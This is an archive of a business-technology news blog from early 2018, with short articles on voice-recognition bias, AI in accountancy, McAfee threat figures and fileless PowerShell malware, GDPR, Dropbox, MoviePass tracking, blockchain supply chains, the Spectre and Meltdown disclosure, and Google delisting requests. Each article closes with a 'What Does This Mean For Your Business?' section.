Monday, March 19, 2018

Voice Recognition 'Sexist'

Delip Rao, CEO and co-founder of start-up R7 Speech Sciences has brought the issue back into the spotlight that voice recognition systems struggle more with female voices.

Not New

The issue has been known about for some time and has been brought into sharper focus with the popularity of voice-activated digital assistants like Apple’s Siri, or Amazon’s Alexa, or Google Home.


According to Linguistics experts, the key problem is that females have higher pitched voices than males, and they tend to be quieter and sound more “breathy” when they talk.

With speech for example, Mean Fundamental Frequency (Mean FO) can be expressed as a number around which vocal tones are spread. The FO for men is around 120Hz, but for women it is much higher at 200Hz.


Also, another problem for voice recognition systems comes when they try to process words and sounds into MFCCs (Mel-frequency cepstral coefficients). The voices of women are known to give a less robust acoustic signal, and this signal can be easily masked by noise. These two challenges also make things more difficult for speech recognition systems.

Lack of Diverse Training

Since speech recognition systems also rely on an AI element, they require training to become more used to recognising certain vocal characteristics. Linguistics experts, therefore, also believe that a lack of diverse training examples of the speech of women may also be a contributing factor to the problems encountered by current voice recognition systems.

Gender Biases As A Result

Some commentators are, therefore, predicting possible worsening gender biases problems with voice recognition systems if these issues are not tackled.

Experts have pointed out the importance of training systems using equal proportions of men and women to avoid the problem of them being very good at recognising male data and very bad at recognizing female data.

Ethnic Mix

The same experts have also highlighted potential biases based on ethnicity if voice recognition systems aren’t trained using a wide ethnic as well as gender mix.

What Does This Mean For Your Businesses?

With digital assistants now in the workplace in computer systems (e.g. Alexa for Business),and with AI bots being used e.g. to handle customer service systems (with a voice element), it’s important that women and / or certain ethnic groups are not at a disadvantage when using the systems.

The problem is known about now, and companies should, therefore, be taking action to make sure that voice recognition systems work well for all demographics, and deliver equality as part of their value.

Accountants To Use AI For The 'Boring' Stuff

A study by Sage that identified how 83% of clients would like their accountants to extend their services has seen 50% of accountants looking to solutions like AI to allow them to free up the necessary time to do so.

Off-Load Repetitive Tasks To AI

With accountancy clients looking for consultancy and advice (42%) as well as traditional services, half of the 3,000 accountants involved in the Sage study appear to be happy to consider AI and automation technology solutions to handle the workload of repetitive tasks such as number crunching, data entry and diary management.

Likely To Invest

The president of AI at Sage, Kriti Sharma, has been reported as having recognised that although AI is currently viewed as an automation tool by accountants, more are likely to invest in AI in the coming years as an important, lower cost way to scale their operations.

For example, AI could be used to review millions of transactions and spot anomalies, and even make recommendations. This would normally be something that would be done manually. AI could, therefore, significantly decrease costs and make accountants more time-rich, thereby enabling them to develop and sell new services.

Many Industries Adopting AI

Accountancy is certainly not the only industry beginning to realise and unlock the potential of AI. For example:
  • Some legal firms are already using AI to assemble, process and read certain types of documents.
  • AI ‘cognitive technology’ is being used to answer customer questions for customers in many areas of services.
  • In banking e.g. Nat West, AI software is being used to offer consumers an investment advice service. Also, for Royal Bank of Scotland (RBS) automated financial advice services have allowed the bank to reduce face-to-face adviser jobs by 220. As far back as 2016, RBS and NatWest introduced their virtual customer service technology in the form of the ‘Luvo’ chatbot from IBM Watson.
  • The AI The chatbot, called 'DoNotPay' (originally launched in March 2016 by British student, Joshua Browder), made famous for providing legal advice that led to a reported 375,000 claims against parking tickets, was then modified so that it could automatically sue Equifax for $15,000 per claim in the wake of a hack and data breach.
What Does This Mean For Your Business?

The adaptability and capacity of AI to learn and tackle even complicated tasks (in April last year an AI program beat the world’s leading poker players in a 5-day competition), means that it has huge business potential. Deploying AI e.g. to tackle repetitive tasks and free-up time in accountancy is just another example of how this technology can be used to add value, save costs, help meet changing customer needs, allow the cost-effective scaling of businesses, and improve competitiveness.

Even though AI appears to be advancing at a fast rate, we really haven’t seen anything yet as regards its true potential.

Eight New Cyber Threats Every Second

The latest McAfee Labs threat report shows that in the last quarter of 2017, organisations faced 8 new cyber threats a second as there was an 18% increase in the number of reported security incidents across Europe.

478 New Cyber Threats Every Minute

The report makes worrying reading as businesses and organisations try to secure their online and data security systems in preparation for the introduction of GDPR.

The McAfee Labs report shows an 18% increase in the number of reported security incidents across Europe with a specific focus the on adoption of newer tools and schemes, such as fileless malware, cryptocurrency mining and steganography.

Cytptocurrency Mining

The rocketing value of the cryptocurrency Bitcoin led to a big increase in cryptocurrency mining / cryptojacking in the last quarter of 2017. For example, cryptojacking involves installing 'mining script' code such as Coin Hive into multiple web pages without the knowledge of the website owners. The scammer then gets multiple computers to join their networks so that the combined computing power will enable them to solve mathematical problems. Whichever scammer is first to solve these problems is then able to claim / generate cash in the form of crypto-currency.

Also, at the end of 2017, ransomware operators were found to be hijacking Bitcoin and Monero wallets using Android apps developed exclusively for the purpose of cryptocurrency mining. Many criminals appear to have favoured Litecoin over Bitcoin because there was a lesser chance of exposure.

Fileless Malware Attacks

Another trend uncovered by the McAfee Labs threat report was the adoption of fileless malware and abusing Microsoft PowerShell, which showed a 432% surge over the course of 2017.

Fileless malware involves hijacking tools that are already built-in to Windows rather than installing software on a victim’s computer. It is designed to work in-memory (in the computer’s RAM) and is, therefore, very resistant to existing anti-computer forensic strategies, and is difficult to detect.

The MacAfee report showed a huge 267% growth in the use of the new PowerShell malware. Powershell is a legitimate tool (scripting language) that is built-in to Windows, and provides access to a machine’s inner core, including Windows APIs. This is why it has become a favoured route for fileless malware attacks.

Increase In Attacks On Healthcare

One other disappointing trend uncovered in the McAfee Labs threat report is the dramatic 210% overall increase in incidents against healthcare organisations in 2017. It is believed that these attacks were facilitated by organisational failures to comply with security best practices, or to address many known vulnerabilities in medical software.

What Does This Mean For Your Business?

The report highlights how businesses now face risks on an unprecedented scale, and how, particularly with GDPR on the way, businesses need to prioritise cyber and data security. A collaborative and liberalised information-sharing approach should be taken to improve attack defences and combat escalating asymmetrical cyber warfare.

Cyber-criminals always try to combine the highest returns in the shortest time with the least risk. This is why tactics like cryptojacking, stealthy fileless PowerShell attacks, and attacks on soft targets such as hospitals have become so popular over the last year.

New threats for this year, such as cyber-criminals developing botnets exploiting the Internet of Things (IoT) will pose more challenges to businesses and the security industry.

New Threat From Fileless Powershell Exploits

Businesses now face the growing threat of fileless hacking and fileless malware attacks facilitated by the PowerShell scripting language that is already built-in to Windows.

Surge Reported

The latest McAfee Labs threat report shows what an emerging and dangerous threat the exploiting of the PowerShell scripting language has become. Taking the last quarter of 2017, the adoption of fileless malware via Microsoft PowerShell showed a 432% surge.

How Does It Work?

Microsoft PowerShell is a scripting language that’s built-in to the Windows OS. Its main legitimate uses include running background commands, checking services installed on the system, terminating processes, and the managing configurations of systems and servers.

The Microsoft PowerShell scripting language provides access to your computer’s inner core, including unrestricted access to Windows APIs. Also, because it is a legitimate part of your computer’s Operating System, any commands it executes are usually ignored by security software, and it provides no signature for antivirus software to detect. Another crucial aspect of Powershell is that it can run remotely through WinRM. For these reasons, it has become an ideal route for cyber-criminals.

Controlling Computers Using Powershell

A hack via Powershell involves attackers getting to PowerShell remotely through WinRM, enabling them to get through Windows Firewall, run more PowerShell scripts complete with admin control. Even if WinRM is turned off, it can be turned on remotely through WMI using a single line of code.

Also, through Powershell, once an attacker obtains a username and password for one computer, the path to complete compromise of the whole enterprise system is laid open.

Recent Fileless Malware Attacks

It has been reported that PowerShell malware arrives via spam email, and it is the embedded code in the email that contains the PowerShell commands. This code usually contains instructions to download another payload to carry out the primary malicious activity.

The McAfee Threat report shows how recent attacks have used Powershell to download malware of the Bartallex (.bat and .vbs files) and Dridex families onto the systems of victims in what are now popularly known as fileless malware attacks.

What Does This Mean For Your Business?

The combination of PowerShell providing legitimate access to computer’s and its subsequent ability to be ignored by security software, as well as the ability to run it remotely through WinRM make it a low risk, low cost and potentially and potentially high return tactic for cyber-criminals. This means that fileless hacks and fileless malware attacks are now a serious and present risk to businesses and organisations of all kinds.

The stealth factor, plus the fact that it goes under the radar of normal antivirus software makes detection very difficult. The one clear chance to stop it appears to be not opening the malicious email that contains the code that begins the attack. Companies and organisations need to make sure that all staff are trained to recognise and resist social engineering tactics, and to be made aware of the risk of downloading and installing applications that they do not understand or trust.

UK Economy Could See £26bn From Rural Digital Investment

A study has revealed that greater investment in digital technologies and
connectivity in rural parts of the UK could add between £12bn and £26.4bn annually to the British economy.

Digital Strategy and Investment Needed

The study, which was commissioned by Amazon and conducted by think tanks Rural England and Scotland’s Rural College (SRUC), showed that the rural economy is already worth £299bn in gross value add (GVA) to the national economy.

The report argues that a government-led digital rural strategy coupled with investment could unlock the potential of businesses in rural areas, and could increase business turnover by £15bn.

Concerns & Challenges

The report found that business owners in rural communities have many of the same concerns as larger businesses in more built-up areas. For example, four in five rural business owners saw digital tools and services as being important to their growth potential, and better access to cloud computing as being the biggest driver for their future growth.

Other perceived growth catalysts in the reports were by 5G mobile networks (54%), the IoT (47%), and machine learning and artificial intelligence (AI) (26%). Export businesses in the retail, tourism, and hospitality industries also identified e-commerce tools as being potential growth drivers.

The main perceived challenges to growth in rural businesses were identified in the report as being access to broadband and other forms of connectivity, and skills shortages (52%) e.g. recruiting people with appropriate skills, or retraining existing workers.


Amazon, who commissioned the report, has offered its own recommendations for public and private sector businesses, based on the results. These include:
  • The establishment of Digital Enterprise Hubs in rural towns to help (small) businesses with connectivity, workspace and training, and collaboration between employees and education / training or re-training providers.
  • The setting up of a single information portal to streamline digital support services.
  • The setting up of a single information portal and local directories to give guidance to businesses on digital resources.
  • Encouraging local, rural businesses that are already lucky enough to have and use superfast broadband services to encourage their peers to do the same.
  • Prioritising investment in connectivity and digital tools for rural businesses.
  • Making support for digital growth a key objective in future rural business support programmes.
  • The government encouraging large technology-driven firms to implement policies focused on digital adoption in rural areas that provide support for smaller businesses.
What Does This Mean For Your Business?

If you run a business in a rural area, you are likely to recognise the challenges outlined in the report and to welcome many of the ‘quick win’ recommendations that Amazon has made, plus the fact that this report has put rural digital business challenges back in the media spotlight.

Given a high priority, and the right level of government support and investment, there is no doubt that early-adopter rural businesses could be big contributors to the UK economy, and could compete with global competitors.

Many commentators, however, see this vision as still being some way off, partly because of the time that it will take to get high-speed broadband connectivity to all rural areas, let alone towns in the UK. For example, despite full fibre broadband pilots already being operated as part of the UK’s National Productivity Investment Fund, the reality is that the UK may still only actually have 7% full fibre coverage by 2020.

Tuesday, March 13, 2018

Facebook Ads That Target Your Beliefs

In a new trial involving a small number of users in the UK, Facebook has said that it will be testing the targeting of adverts based on user’s specific political and religious beliefs.


According to Facebook, the trial will help the social media platform to process and manage its customer data, so that it will be in a better position to ensure compliance with GDPR when it comes into force in May this year.

The severity of the fines associated with the enforcement of GDPR for large companies such as Facebook e.g. a fine for a breach of up to €20 million or 4% of their global annual turnover, whichever is greater, is likely to be a big motivator behind a trial that could improve how Facebook processes and stores data.

How Could Targeting Adverts This Way Be Of Help?

The trial appears to be using adverts for consenting participants to focus on testing and improving how the company handles the required greater consent from data subjects that GDPR will bring, and to ensure that sensitive data is better protected.

One other important result of the trial will be to enable the testing of facial recognition. Facebook is exploring how it can successfully give users an opt-in for facial recognition, which will form part of a measure to stop online impersonations by informing users whenever their faces have been used elsewhere on the site.

The Trial

It has been reported that the trial will work by first asking a number of UK users for permission to allow advertisers to target them on the basis of their political and religious beliefs, and their listed interests.

It is understood that Facebook will also ask users whether they are happy for their public information that identifies them (e.g. their faith and politics) to remain visible for everyone and, if permission is given, Facebook will provide an opt-in for allowing the information to be used to personalise content, and also act as one of the signals for relevant suggesting ads. This will include targeted advertising based upon things like politics, sexuality and faith.


Some people have expressed fear that opting-in to elements of the trial could enable extremists to use targeted advertising for recruitment propaganda. Facebook has denied this.

What Does This Mean For Your Business?

This story is more proof that the seriousness of the implications of GDPR is hitting home, particularly with those companies that stand to lose in a big way if they are found not to be compliant. Although the subject of targeted advertising is an emotive one that can make us feel a bit uneasy as Internet users in terms of privacy, it is at least good news that this Facebook trial could lead to better protection of our personal data by a platform that arguably knows more about us than most.

With X-day now past this story should be another reminder that its time for companies everywhere to think about double-checking that their own systems and procedures will be GDPR compliant.

One Hour To Take Down Illegal Content

New measures by the EU will mean that technology companies will have as little as just one hour to take down illegal and terror content, or face penalties under new legislation.

Why Only One Hour?

The new measure, which has reportedly been met with dismay by the big tech companies such as Google and Facebook (who will arguably be most seriously affected), is focused mainly on terror-related content. The logic that because terrorist content is considered to be most harmful in the first hours of its appearance online, all companies will, therefore, be required to remove such content within only one hour from its referral, as a general rule.

Other illegal content that is being targeted by the new measures includes incitement to hatred and violence, child sexual abuse material, counterfeit products and copyright infringement content.

3 Months To Report Back

As well as the news that tech companies must remove the most serious content within one hour, the EC has also announced that any tech company that is responsible for people posting content online will have only three months from now to report back to the EU on what they were doing to meet the new targets it has set.

Operational Measures

The EC recommendations are that a set of operational measures will be used to ensure faster detection and removal of illegal content online, to reinforce the cooperation between companies, trusted flaggers and law enforcement authorities, and to increase transparency and safeguards for citizens. These operational measures will be:
  • Clearer 'notice and action' procedures. Companies should set out easy and transparent rules for notifying illegal content. These should include fast-track procedures for 'trusted flaggers'. Also, to avoid unintended removal of content which is not illegal, content providers should be informed about such decisions and have the opportunity to contest them.
  • More efficient tools and proactive technologies. This means that companies should set out clear notification systems for users. These should include proactive tools to detect and remove illegal content, in particular for terrorism-related content and for content which does not need contextualisation to be deemed illegal, such as child sexual abuse material or counterfeited goods.
  • Stronger safeguards to ensure rights. To ensure that decisions to remove content are accurate and well-founded, companies should put in place effective and appropriate safeguards. These should include human oversight and verification, in full respect of fundamental rights, freedom of expression and data protection rules.
  • Special attention to small companies. The technology industry should, through voluntary arrangements, cooperate and share experiences, best practices and technological solutions, and this shared responsibility should particularly benefit smaller platforms with more limited resources and expertise.
  • Closer cooperation with authorities. If there is evidence of a serious criminal offence or a suspicion that illegal content is posing a threat to life or safety, companies will be required to promptly inform law enforcement authorities, and EC Member States should establish the appropriate legal obligations.
  • The recommendations are in addition to on-going work with the technology industry through voluntary initiatives to ensure that the internet is free of illegal content, and are intended to reinforce actions taken under different initiatives.
Response From The Tech Industry

Although Facebook has said that it shares the European Commission's goal, the industry association EDiMA, (which includes Facebook, Google, and Twitter) has stressed that the one-hour turn-around time could harm the effectiveness of service providers' take-down systems rather than help.

What Does This Mean For Your Business?

As the Vice-President for the Digital Single Market Andrus Ansip has pointed out, online platforms have become many people's main gateway to information. For this reason, and if we accept that what is illegal offline is also illegal online, many people feel that these widely used technology platfoms now have a responsibility to provide a secure environment for their users. Many businesses are advertisers on these platforms, and are likely to share a desire to rid them of illegal content.

While some popular tech platforms have continued to resist what some see as too much censorship, interference, or over-regulation, the frequency and severity of terrorist attacks in Europe and the role and influence of platforms in spreading information, true or false (e.g. the US election) has given governments the fuel, impetus, and feeling of justification to try and apply more force to tech companies. The EC’s view is that the spread of illegal content online undermines the trust of citizens in the Internet and poses security threats, and the new operational measures could, along with any self-regulation, speed up the process of clearing illegal content.

The scale and frequency of illegal content posting has posed serious cost and resources challenges to tech platforms in recent years.

Dropbox Integrates With Google Cloud and G-Suite

Dropbox has announced that it is now one step closer to delivering
a unified home for work by forming a new partnership with Google Cloud that will integrate G-Suite in its cloud storage.

What Was The Problem?

Dropbox had been looking for ways to respond to the need for users to be able to help customers to make projects easier to manage, centralise their frequently used files and information, and reduce the time wasted in having to swap between files and bits of work scattered across storage buckets, apps, and devices. The company is also looking for new ways to compete in a crowded cloud storage market.

The new integration that the partnership will deliver to all Dropbox users will mean that they can use Dropbox to create, open, and edit Google Docs, Sheets, and Slides files live. It will also mean that Business Administrators will be able to manage Google Docs, Sheets, and Slides files like any other content that resides in Dropbox.

With a G Suite made accessible, no matter what tools users bring to work, Dropbox and Google customers will be able to better collaborate with their frequently used tools.

Additional Native G Suite Integrations

As well as being able to use Google Docs and files in Dropbox, users will also be able to benefit from additional native G Suite integrations e.g. with Gmail and Hangouts Chat. This could help teams to stay connected with project content and the conversations around it. The Gmail add-on will allow users to display the dates of creation, modification, and last-accessed for linked files, and the Hangouts integration will bring previews for linked files directly to chats.

When Is It Available?

The new Dropbox, Google Cloud and G-Suite integration will be made available to Dropbox customers in the second half of 2018.

One of Many Collaborations For Dropbox

This is one of many collaborations with leading brands for Dropbox in recent times. For example, Dropbox has formed partnerships with Adobe Creative Cloud and its Adobe XD, Microsoft, Apple, and Workplace by Facebook.

Answer To Competition

The latest partnership with Google is another way that Dropbox can fight back against some fierce competition from the likes of Microsoft. For example, Microsoft is reported to have been trying to lure users of cloud services from Box, Dropbox and Alphabet's Google Drive by giving them its competitive product ‘OneDrive for Business’ for free until their current contract expires. Microsoft will be running the promotional switching offer for the next five months.

What Does This Mean For Your Business?

For businesses that collaborate online and need to centralise stored documents, this latest partnership is likely to be good news. The promise of centralised content, secure collaboration, and more effective communication through platforms that are already in popular use for many businesses could bring cost and time savings, reduce wastage and frustration, and could improve competitiveness by simplifying things.

All the collaborations between Dropbox and other leading brands could be particularly beneficial to small businesses that will be able to more easily access files, documents and other types of data they need on a daily basis.

Also, this good news about Dropbox can only be helpful in making some headway in restoring trust and helping customers to forget about the bad news from last September when it was revealed that the usernames, email addresses and encrypted passwords of an astonishing 68 million customers, stolen in a hack back in 2012 had re-surfaced in a leak.

Location Based Marketing ... Tracking You At The Flicks

MoviePass CEO, Mitch Lowe, has caused controversy by telling the Hollywood audience at the Entertainment Finance Forum that his MoviePass app can track and gather information about users before and after their trip to the movies.

What Is MoviePass?

MoviePass, based in New York, offers a service whereby, for a flat monthly fee ($9.95 per month), users can go and watch unlimited number of movies in cinemas, with some restrictions. It could be described as a kind of Netflix for moviegoers.

Location Tracking

According to the MoviePass CEO, the company’s app has location-tracking built-in. What some commentators have described as ‘creepy’ though is that the app can track your movements long before and after you’ve been to watch a movie.


What MoviePass prefers to call ‘location-based marketing’ is reportedly being used to improve the customer’s experience of the service and create more opportunities for subscribers to enjoy all the various elements of what the company thinks make up a good movie night. The company says that by tracking customers and gathering data along the way, it can “create a full-featured movie-going experience”.


The big idea is that subscribers may want refreshments before or after the movie, and may have to travel some distance to the cinema. By knowing a subscriber’s location and route, MoviePass can then, via the phone app, give the subscriber details like discounts on transportation, finding places to park nearby, coupons for nearby restaurants, and other similar opportunities.

What Kind Of Data Is Gathered?

According to online reporting of CEO Lowe’s speech, as well as your location, the MoviePass app is also capable of gathering “an enormous amount of information,” which includes your address, which Mr Lowe says can be used for demographic information.


What MoviePass may see as a kind of personalised, helpful marketing idea, critics appear to see as a potentially dangerous invasion of privacy that could have security consequences for MoviePass subscribers.

What Does This Mean For Your Business?

Using new technology to improve marketing and customer experiences is all very well, but the point here is that customers need to be informed exactly what happens to their data, what is collected by the app, how it’s stored and for how long. This will enable them to make an informed choice, give consent, or decline. In a time when cyber-crime and data mismanagement and theft appear to be rife, customers value their privacy and data security more than ever. Companies need to be transparent about their intentions and methods, and need to be able to show customers that they can be trusted with their valuable personal data.

Also, in this case, it appeared to come as a shock about the capabilities of the app, and to some commentators, it may have appeared to be an inappropriate way and style to reveal what the app is capable of. This is likely to prompt complaints from some customers, and could harm the reputation of MoviePass.

If you are worried about the security implications of apps of this kind, for example, you could try to limit location data collection by going into your phone’s app settings. One other, obvious way to avoid any problems with the app would be to avoid MoviePass for now.

The introduction of GDPR in May this year is also likely to have implications for how MoviePass deals with the data of any EU citizen subscribers, as the company will need to comply with the new Regulation.

Blockchain Used To Reduce Child Labour

Blockchain, the same technology that powers the Bitcoin cryptocurrency,
is being tested in a pilot project between car-maker BMW and start-up Circulor with a view to eliminating battery minerals produced using child labour.

What Is Blockchain?

Blockchain is an incorruptible peer-to-peer network (a kind of ledger) that allows multiple parties to transfer value in a secure and transparent way. Blockchain’s Co-Founder Nic Carey describes Blockchain as being like “a big spreadsheet in the cloud that anyone can use, but no one can erase or modify”.

Battery Mineral Problem

The pilot between BMW and Circulor is focusing on reducing child labour by finding a way to avoid using any cobalt that is mined in unregulated artisanal mines in Democratic Republic of Congo. At the moment one fifth of cobalt is mined in a way that often uses child labour.

How Can Blockchain Help?

The pilot project is using Blockchain to help provide a way to prove that artisanal miners are not using child labour in their cobalt mining activities.

Each bag of cobalt produced by an artisanal miner will be given a digital tag. This tag will be entered into Blockchain using a mobile phone. The details of the digital tag will then be entered by each link in the chain of buyers, thereby providing a clear, verifiable trail, all the way from miner to smelter. Since Blockchain is ‘incorruptible’, provided all organizations throughout the supply chain will be involved in the project, the Blockchain evidence should be accurate.


Challenges to the system being tested in the pilot could include cobalt mined by a child could simply being mixed in with ‘clean’ cobalt prior to processing.

Used In Similar Industries

There is every reason to think that Blockchain could help with ethical cobalt mining and supply because it has been used in a similar way by the diamond industry to provide a forgery-proof record of a diamond’s lifecycle.

What Does This Mean For Your Business?

The Blockchain technology has always shown huge promise, beyond simply being used in digital currencies. One of its key strengths is that trust is embedded into the incorruptible system. This means that businesses can use it to categorically prove a certain source and route for e.g. delivery, raw materials or production. This could be particularly valuable to businesses where provenance of some kind is necessary to add to the monetary, ethical or other value of a product or service.
  • After first being used in the financial, legal and public sectors, Blockchain is now being used by businesses and organisations around the world in many other different ways such as:Using the data on a Blockchain ledger to record the temperature of sensitive medicines being transported from manufacturers to hospitals in hot climates. The ‘incorruptible’ aspect of the Blockchain data gives a clear record of care and responsibility along the whole supply chain.
  • Using an IBM-based Blockchain ledger to record data about wine certification, ownership and storage history. This has helped to combat fraud in the industry and has provided provenance and re-assurance to buyers.
  • Shipping Company Maersk using a Blockchain-based system for tracking consignments that addresses visibility and efficiency i.e. digitising a formerly paper-based process that involved multiple interactions.
  • Start-up company ‘Electron’ building a Blockchain-based system for sharing information between those involved in supplying energy which could speed up and simplify the supplier switching process. It may also be used for smart grid processes, such as local load-balancing of supply and demand.
  • Australian start-up Zimrii developing a Blockchain-based service that allows independent musicians to sell downloads to fans, distribute the proceeds between collaborators, and allow interaction with managers.
Blockchain still has huge untapped potential for all kinds of businesses and could represent a major opportunity to improve services, and effectively tackle visibility, transparency and efficiency issues.

Sunday, March 04, 2018

Fight For DPOs With Introduction of GDPR

Technology and employment commentators are predicting that with the already high demand for skilled and talented Data Protection Officers (DPOs), the introduction of GDPR may see businesses having to compete to recruit the right one.

What’s A Data Protection Officer?

A DPO’s role is essentially that of looking after any legal and ethical issues related to handling customer data. They are required to have specialist knowledge in matters relating to data and information privacy and security.

What Is Demand For DPOs Like Now?

According to figures from the Indeed job search site, DPO job listings posted in the UK have increased by no less than 700% over the past 18 months. That’s the equivalent of an increase from 12.7 listings per 1 million in April 2016 to 102.7 listings per 1 million in December.

Triggered An Increase In Training

The huge increase in the demand for DPOs has led to a corresponding increase in the demand for GDPR training, as individuals spot a potentially lucrative career, and companies seek to bring their in-house DPOs up to speed.

Some GDPR training providers have reported selling out of courses for the next six months as demand for GDPR-Ready training programs for DPOs have increased by as much as one-third.

Even Bigger Demand With Introduction of GDPR

The International Association of Privacy Professionals (IAPP) estimates that, with the introduction of GDPR in May this year, 28,000 DPOs will be needed in Europe and U.S. and perhaps as many as 75,000 around the globe.


GDPR requires that companies must have a DPO to help with tasks such as data audits for compliance with privacy laws, training employees on data privacy, and to be the main point of contact in the company for European regulators.

With its 99 articles, under the guidance of 6 privacy principles, General Data Protection Regulation (GDPR) is long, and complicated, and it needs as well as requires someone within the business to understand it, and how it should be practically applied. Failure to comply with GDPR, and data breaches resulting from non-compliance can bring large fines and other potentially disastrous consequences for businesses and organisations e.g. loss of customers, and damage to brand and reputation.

Legal and business commentators are also predicting that companies may only want to deal with suppliers who are GDPR compliant in order to maximise their own compliance and avoid the penalties.

What Does This Mean For Your Business?

For those who are already, or are currently training to be DPOs, the immediate future looks bright in terms of their choice of employment, the massive (and growing) demand for their services, and the bargaining power that this may give them with employers e.g. for their salary.

For businesses that are already trying to get to grips with the complications and costs of complying with GDPR, and who already know that they will need somebody in the DPO’s role, they may not have anticipated the extra complication of having to compete with other businesses to get one. With the demand for good DPOs looking like continuing to out-strip supply, the situation may arise where some businesses attempt to poach DPOs from others.

With X-day already past, and the introduction of GDPR just 3 months away, the clock is now ticking loudly for businesses that may not yet have given any serious thought to the role of DPO, or where to get GDPR training.

Intel Didn’t Reveal Chip Flaws To Authorities First

It has been revealed that US authorities found out about the Spectre and Meltdown chip flaws from media reports rather than being informed directly by US computer chip manufacturer Intel.

What Chip Flaws?

Back in January, researchers from Google's Project Zero, the Technical University of Graz in Austria and the security firm Cerberus Security in Germany, discovered that two major security flaws are present in nearly all modern processors / microchips. The hardware flaws were dubbed ‘Spectre’ and ‘Meltdown’.

Meltdown affects all Intel, ARM and most other processors on the modern market. It is believed that Meltdown could affect every processor since 1995, except for Intel Itanium and Intel Atom before 2013. The flaw could, for example, leave passwords and personal data vulnerable to attacks.

Found Out Via The Media

In this latest revelation, news has emerged that Intel didn’t inform US cyber-security officials about the flaw in its processors until after the news had been leaked to the media.

Google’s parent company Alphabet has said it informed Intel, AMD and ARM about the chip flaws in June 2017, and the three semiconductor / chip manufacturers were given 90 days to fix the flaws before disclosing the discovery of the flaws and the fix to the public. According to Alphabet, and in keeping with ‘standard practice’, it had left it up to the companies to decide whether they should inform government officials about the security flaws.


In response, Intel gives a slightly different version of events. According to Intel, Google Project Zero had chosen to extend the 90-day timeframe to 9 January 2018, and Intel had agreed to keep the information confidential until that date.

No Exploits Anyway

Even though there is general agreement that the security flaws are now present in nearly all modern devices, including all iPhones, iPads and Macs, Intel has been quick to stress that there have been no known exploits to date.

What Does This Mean For Your Business?

It is worrying that ‘standard practice’ in the industry is to be allowed to keep quiet about a security problem for 3 months from government cyber-security officials, and from the public. It is also worrying that it took journalists to uncover the problem, particularly when you consider the sheer scale of the flaws i.e. that they’re present in almost all modern processors.

There have been far too many stories of large, well-known companies choosing to keep quiet as long as possible about cyber / data security risks or breaches, and these episodes all serve to undermine confidence that companies will act responsibly themselves, without the threat of new regulations and huge fines (such as those that GDPR will bring).

The best advice to businesses is now to install all available patches for the flaws without delay, and to make sure that you are receiving updates for all your systems, software and devices.
Regular patching is a good basic security habit to get into anyway. Research from summer 2017 (Fortinet Global Threat Landscape Report) shows that 9 out of 10 impacted businesses are being hacked through un-patched vulnerabilities, and that many of these vulnerabilities are 3 or more years old, and there are already patches available for them.

Amazon’s $1 Billion ‘Smart Doorbell’ Purchase

Amazon has paid $1 billion for ‘Ring’, a smart doorbell company, so that it can improve how it delivers parcels, and compete with Google and Apple in expanding the opportunities for their digital assistants and app ecosystems.

What Is Ring?

Ring, run by CEO Jamie Siminoff, is a US company that primarily manufactures ‘smart doorbells’. These doorbells work by recording live videos of customers’ doorsteps, then sending the videos to their smartphones.

Filming Couriers

There are obvious security benefits for customers from an innovative IoT product of this kind. In this case however, there is also a big benefit for Amazon in helping its customers trust its new service which allows couriers open people’s front doors and put deliveries inside. The new service, which was first announced in October last year, requires a leap of faith from customers, as they have to trust couriers to enter their premises unaccompanied to deliver parcels (while being filmed).

In the original plans for the service, smart locks and Cloud Cam cameras were to be used to monitor couriers who would scan a package barcode outside the door, and once the delivery has been verified online, the camera would record the delivery person unlock the door (using an app) and making the delivery. The purchase of ‘Ring’ enables Amazon to acquire the system to operate this service effectively in the marketplace very soon.

Part Of A Bigger Battle

The purchase of Ring for $1 billion is further serious evidence of Amazon competing with multiple rivals for all aspects of our homes, and invariably, our business premises.

For example, back in September 2017, Nest (owned by Alphabet / Google) released an internet-connected intruder alarm, a video-streaming doorbell, and a door lock system that was developed in collaboration with Yale. Nest has also just announced that it will be incorporating Google Assistant into its products so that they will work with Google Home.

It is, therefore, not just the lure of the lucrative and growing smart home security market that Amazon has been interested in, but also the competition among the big players – Google, Apple and Amazon – to link up their digital assistants with many different smart home devices e.g. to control the lighting, heating, and now the security.

What Does This Mean For Your Business?

Many businesses receive frequent parcel deliveries during the day, and this type of service may, therefore, be a useful one (particularly for smaller businesses), and could minimise disruption and help efficiency. Amazon has the parcel delivery network, the services e.g. Amazon Business (its online trade counter), and now its point of delivery security system.

This product is an example of how multiple technologies have linked together to provide another new business opportunity in a new and growing market. Some critics have, however, pointed out that this service requires some serious faith and trust from customers, and that it would only take a few incidents to kill that trust and to force the expensive idea onto the back burner. There is still, of course, the broader, general problem of IoT security, which has not been fully addressed in many other products, and could still prove to be the Achilles Heel in this one.

This story is also an example of how Amazon is expanding and diversifying into many different aspects of our home and business lives e.g. parcel delivery, groceries, and now smart security. The story is also an example of how the big home digital assistant manufacturers are now locked in competition to expand the number of products and services that link up to their devices e.g. Amazon Echo, and this market could provide many business opportunities for many other tech companies and manufacturers in the along the way.

Google Acted On Less Than Half Of Requests To Remove URLs

Google’s latest Transparency Report reveals that of the 2.4 million requests made since 2014 to remove certain URLs from its search results, Google has only complied with less than half.

Removal Requests

The removal requests relate to a ruling by the European Union's Court of Justice in May 2014 which said that Google and other search engines can be held responsible for personal data that appears in its search engine results pages - they are considered to be ‘Data Controllers’. Google and other search engines can, therefore, be asked to remove links to some web pages that are published by third parties, and any EU citizen can ask Google to remove information about them from their search results.

Doesn’t Have To Comply

The problem with the ruling for individuals who want their data removed is that Google doesn’t actually have to comply with the request, and can refuse to take links down if can demonstrate that there is a public interest in the information remaining in the search results. Google can also re-instate links that it has already taken down in a previous request if it can show that it has grounds to do so.

One example highlighted in Google’s Transparency Report concerns the UK man who managed to get Google to delist 239 (of 300) URLs that linked him to a fraud conviction where he was later found to be innocent. Following a 2nd request by the same man to remove pages relating to a benefits case linked to him, Google refused this request AND re-instated the previously de-listed URLs because it said that he provided forged documents with his 2nd request.

Two Main Reasons

The statistics appear to indicate that the two most likely reasons why Google would be asked to consider de-listing URLs are when they relate to personal information being shown in social media and directory services, and when aspects of a requester's legal history from news outlets and government websites are shown in the search engine results.

What If Google Refuses Your Request?

Examples of why Google may refuse to take URLs down include when they give business information that might be useful for potential customers, or if the content about a violent crime could be of interest to the general public.

If Google refuses your request to take down certain URLs, you can then still take your complaint to the national data watchdog. This, of course, takes time.

Less Than Half Of Requests

The Transparency Report shows that, since May 2014, Google has not delisted 56.7% of URLs, and in the UK, 60.2% of requests to remove certain URLs were not complied with by Google.

What Does This Mean For Your Business?

